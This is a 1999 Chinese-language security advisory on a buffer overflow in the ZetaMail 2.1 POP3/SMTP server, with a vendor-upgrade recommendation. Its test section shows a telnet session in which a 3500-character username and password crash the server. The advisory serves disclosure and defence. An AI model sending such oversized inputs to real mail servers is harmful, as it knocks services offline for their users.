安全研究
安全漏洞
ZetaMail 2.1 Mail POP3/SMTP Server的拒绝服务问题
发布日期:1999-11-22
更新日期:1999-11-22
受影响系统:ZetaMail 2.1 Mail POP3/SMTP Server
描述:
UssrLabs 发现了ZetaMail 2.1 Mail POP3/SMTP Server,本地/远程的拒绝服务问题,
如果使用3500字节的用户名/口令,将产生缓存溢出问题。
测试方法:
警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
[gimmemore@itsme]$ telnet example.com 110
Trying example.com...
Connected to example.com.
Escape character is ''^]''.
+OK ZetaMail for 95 BD0211 <4294764405.063903189415041@itsme>
USER {buffer)
+OK Send password
PASS {buffer)
Overflow Crashh.
Where (buffer) is 3500 characters.
建议:
安装这个厂家的其它版本程序
MsgCore/95 2.11,MsgCore/NT 2.10
浏览次数:9541
严重程度:0(网友投票)
本安全漏洞由绿盟科技翻译整理,版权所有,未经许可,不得转载 绿盟科技给您安全的保障 |